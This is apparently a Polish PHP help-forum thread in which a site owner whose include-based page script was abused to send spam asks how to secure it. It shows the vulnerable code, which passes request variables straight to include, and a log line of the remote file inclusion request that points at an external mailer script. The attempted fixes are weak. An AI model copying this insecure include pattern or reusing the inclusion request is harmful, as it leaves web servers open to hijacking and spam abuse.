Zostałem zaatakowany. Hacked & SPAM Opcje

[admin22]

Witam.
Miałem nie dawno przykre doświadczenie z wykorzystaniem mojego skryptu do rozsyłania spamu.

Struktura moich adresów www była nateępująca: http://domena.pl/?dzial=katalog& str=nazwa_pliku

[PHP] pobierz, plaintext 
<?php
if ($dzial=="" && $str=="")
				  {
				   include "serwis/pierwsza.php";
				   }
				   else
				   {
				   $adres="$dzial"."/"."$str.php";
					include "$adres";
					}
?>
[PHP] pobierz, plaintext 

Niestety skrypt został wykorzystany przeciwko mnie:

196.207.13.162 - - [14/Dec/2006:15:23:38 +0100] "POST
/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?
HTTP/1.1" 200 20865
"http://domena.pl/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

W konsekwencji zmienna dział pozwala na wykorzystywanie obcych skryptów.

W jaki sposób mam przekształcić prosty skrypt, aby nie umożliwiał zmiennej dział i str na tego typu działania.
Bardzo proszę o pomoc z uwagi na to że mój serwis został zablokowany.

[fiszol]

Temat: Bezpieczenstwo skryptow php
na 1-szej stronie powyższego tematu masz rozwiązanie.

W ogóle strasznie to napisałeś.

Ten post edytował fiszol 18.12.2006, 18:41:41

[admin22]

I co może coś innego?? Bo albo czegoś nie mam zainstalowanego, albo żle to robie!!
Pojawia mi się taki komunikat:

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/aa16006/domains/domena.pl/public_html/index.php on line 279

[PHP] pobierz, plaintext 
<?php
if ($dzial=="" && $str=="")
				  {
				   include "serwis/pierwsza.php";
				  }
			   else
				  {
if(isset($_GET['dzial']))
{  
$page = ereg_replace("://","#",$_GET['dzial']);
}
else
{  
 
$adres="$dzial"."/"."$str.php";
					include "$adres";
} 
 
				  }
?>
[PHP] pobierz, plaintext 

[PHP] pobierz, plaintext 
<?php
przed includem$_GET['plik']=str_replace("/", "#", $_GET['plik']);include $_GET['plik'];dalej....
?>
[PHP] pobierz, plaintext 

Nie wiem jak to zrobić!!

I nie wiem co dalej!!
Co oznacza ten komunikat:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/aa16006/domains/domena.pl/public_html/index.php on line 279

Jeżeli coś mam z serwerem że skrypty nie działają to skontaktuje się ze swoim adminem serwera!!
Ktoś wie o co biega??
Pleaasss F1, F1, F1..

[nospor]

[PHP] pobierz, plaintext 
<?php
$page = ereg_replace("://","#",$_GET['dzial']);
?>
[PHP] pobierz, plaintext 

no ale co to ma byc? nie wiesz, ze jesli dasz \" - to takie cos oznacza ze wstawiasz ". I taki zapis powoduje ze masz niepodomykane ". skladniowo poprawnie powinno byc tak:

[PHP] pobierz, plaintext 
<?php
$page = ereg_replace("://","#",$_GET['dzial']);
?>
[PHP] pobierz, plaintext 

ale czy to bedzie to samo wyrazenie co chciales to juz nie wiem

F1, F1, F1..

Daruj sobie. napisz po ludzku "Pomoc". to nie tak ciezko

proszę poprawić tytuł o znacznik zgodnie z zasadami forum Przedszkole:
Temat: Tematyka i zasady panujace na forum Przedszkole

[admin22]

ślicznie dziękuje (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) )